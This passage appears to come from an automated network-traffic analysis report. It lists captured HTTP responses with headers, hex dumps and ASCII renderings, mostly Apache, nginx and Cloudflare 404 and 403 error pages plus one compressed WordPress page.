16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 601Connection: closeDate: Tue, 03 Dec 2024 13:51:53 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 44 69 65 20 61 6e 67 65 67 65 62 65 6e 65 20 53 65 69 74 65 20 6b 6f 6e 6e 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 77 65 72 64 65 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 
3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:52:12 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:52:15 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:52:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:52:20 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:53:10 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:53:13 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:53:16 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:53:18 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 03 Dec 2024 13:53:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ONeeRoabhrNsJJhgdNF9R3wL3UE7ON6xRxKxvuOUFjoMUehqYhaGj3iFTc6tENmViJNABpc9iUmHIUfxNi%2BfyPaxS5GEoiZ3gQUFIHJ3f5cp6lRi4bKF5Kf5IICJHDiFBycduC9AVg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec40b783c4143c9-EWRContent-Encoding: gzipalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=102805&min_rtt=102805&rtt_var=51402&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=692&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Vp/JLIIr$T";Ctv6PiEv0yyr0.mx
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 03 Dec 2024 13:53:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o5XxtAP1KZgtxTkAjy8mtLYFaG9eSo0eGmy8AAmKSOXHeb3SBaTfqnvRix%2FOdf%2F%2FD84HlRaNnZujrV0Ob01l2ujWtw7MoynFLFycsSPKgn0Y%2FtT3pzegW9pfZNUnQ9tYssE7Wxy1Zw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec40b88ad50de97-EWRContent-Encoding: gzipalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=102703&min_rtt=102703&rtt_var=51351&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=712&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Vp/JLIIr$T";Ctv6PiEv0yyr0.mx
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 03 Dec 2024 13:53:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8C%2F9sTr3ONQ4CfGEP5rT6wQlo10UdzNLgGgcczkSoWInLFix4%2FssDoQQDb13lKr6oSbecX7GxlZDglKH%2BZIgd4kDMCJQwUr3h3hY5p3I4ZEoAIb%2FACKLcwwHVAEL%2BS%2FQ1PYM22rFAQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec40b99082b19cf-EWRContent-Encoding: gzipalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=103063&min_rtt=103063&rtt_var=51531&sent=3&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7861&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Vp/JLIIr$T";Ctv6PiEv0yyr0.mx
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 03 Dec 2024 13:53:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CJ6HVhxQIol6eeLbu15eF0NUhkrFETNzTO3a%2FwcIQVbYIGqhiwLO7n%2BRu0Hl1JKNDeoMj0SG4HUUAvT00IlCas1HlqMQsYpnFtHBQqMFK4IZUg%2FZO9VO0t1xSnAg3z%2B60n57FtbaTQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec40ba97a144379-EWRalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=103071&min_rtt=103071&rtt_var=51535&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=423&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:54:26 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e4 b2 eb 92 dc c6 95 2e fa 9b fd 14 10 14 24 bb ed ce 42 dd 2f cd aa f6 9e b1 e5 73 bc c3 de 72 58 9a f0 9e 90 74 7a 27 80 04 90 ea 44 26 94 48 74 75 89 d3 3f 24 91 34 87 6f 31 e1 b0 5b e4 11 ad e1 a6 ad 08 9e 27 41 bd cd 59 40 02 55 a8 2a 54 5f c8 6e 1d 8f 0f a5 46 ad 5c f7 ef 5b df f8 bd 5f 7c f8 f3 8f ff f5 b7 1f 18 81 0a d9 e1 ce 38 fb 31 5c 2a 27 a6 54 cc 34 18 e6 fe c4 c4 d2 cc 42 04 bb 87 3b 77 c6 21 51 d8 70 02 2c 63 a2 26 e6 bf 7c fc 4b 34 34 0d 6b 11 e1 38 24 13 f3 84 92 69 24 a4 32 0d 47 70 45 38 64 4e a9 ab 82 89 4b 4e a8 43 50 fe d8 37 28 a7 8a 62 86 62 07 33 32 69 15 7d 18 e5 c7 86 24 6c 62 46 52 78 94 11 d3 08 24 f1 26 66 a0 54 74 60 59 7e 18 f9 0d 21 7d eb d4 e3 56 ab a6 8a 72 df c6 ce f1 5a 59 80 67 98 d3 19 d6 a5 21 93 91 d3 88 82 a8 28 57 54 31 72 98 9e cf 1f a5 7f 9b 7f 95 be 4c 9f 1b e9 ff 33 7f 96 be 32 e6 8f e7 4f d3 ef e0 ef fb f4 79 c3 b8 f7 fe b0 dd 6a 3d 30 f2 cc ef e6 8f d3 37 90 f4 5c 3f 5f a4 6f e0 f7 e9 fc c9 d2 75 9e be 4e 5f cc ff 90 59 f3 6f b4 fb db 3c f0 12 1e e7 3a 73 6c e9 e1 3b 15 06 ef 4b 61 0b 15 df 5f f0 77 3f c4 a7 88 86 d8 27 28 92 24 e3 f7 80 61 e9 93 fb 7a fd 58 cd a0 03 0d fd 03 1a ef 7e 12 d3 2f 49 0c 87 4b 94 30 0d fa d9 be a1 3d ff 97 76 ed 67 be 3d e3 61 de 1b 53 8e 28 57 92 f2 98 3a 28 4b 3b 30 3a cd 66 33 3a 35 5a bd fc e7 6c 6c e9 ee 55 92 ef bb 3c ce 16 f1 88 72 82 fb 9a e8 fb ab 1c e7 9b 55 ce 82 99 22 92 63 05 e7 54 b3 08 44 82 a3 88 51 07 2b 2a b8 25 e3 f8 a7 70 13 08 65 54 4c cc 1b a4 d7 b8 c7 f0 17 89 28 4e f6 97 bc ea 6f e9 
f3 aa 3a e2 75 79 78 84 b8 96 f9 77 07 60 b1 fc a2 df fc d1 fc d9 fc 6b 70 be b8 10 8f 23 c2 10 54 14 57 81 c5 8e a4 91 3a dc 99 52 ee 8a 69 e3 68 1a 91 50 7c 4e 3f 22 4a 51 ee c7 c6 c4 78 68 da 38 26 ff 22 99 79 50 b4 fd d4 fa d4 8a 1b d3 ac e7 a7 56 ae c6 f8 53 68 2e c9 a7 56 5e fc a9 d5 ea 35 9a 8d ce a7 d6 a0 7d 3a 68 7f 6a 99 fb 26 39 55 50 df 88 b8 0f 8f f8 c4 7f bb 7e 50 98 77 83 df 0f 74 43 b0 b2 b7 48 a4 43 cc 83 87 26 a8 19 6e 91 97 15 fd f3 f6 55 1e 3e b5 a6 11 a8 dd 61 89 9b 0d fa 3c ce 1d 79 09 82 13 13 40 db 08 29 6f 7c 1e ff ec 84 c8 49 bf 31 68 b4 cc b3 b3 07 3b d6 4f de 33 3e 0e 68 6c 78 94 11 03 7e 71 a2 04 f2 09 27 12 46 ba c6 4f ac 9d f7 bc 84 3b 99 14 76 e9 3e df 7b 78 82 a5 21 f6 e3 7d f2 a0 f4 1b ce 2e d9 7b a8 e4 2c 8f a9 c9 c3 38 89 22 21 d5 c7 24 56 f1 01 d9 57 34 04 0b 87 d1 c1 2e 27 53 e3 17 d0 78 af 71 82 59 42 3e f4 76 f7 ce 1e c4 24 8e a1 cd 47 4a 48 e0 a9 11 13 f5 2b 40 bb 2b f6 ff fb 47 1f fe 8f 46 ac 24 5c 8d 7a b3 5d b5 b7 77 06 44 38 41 36 ee ec 6c 31 3e da 85 19 d9 6a a4 e1 00 54 f9 3b
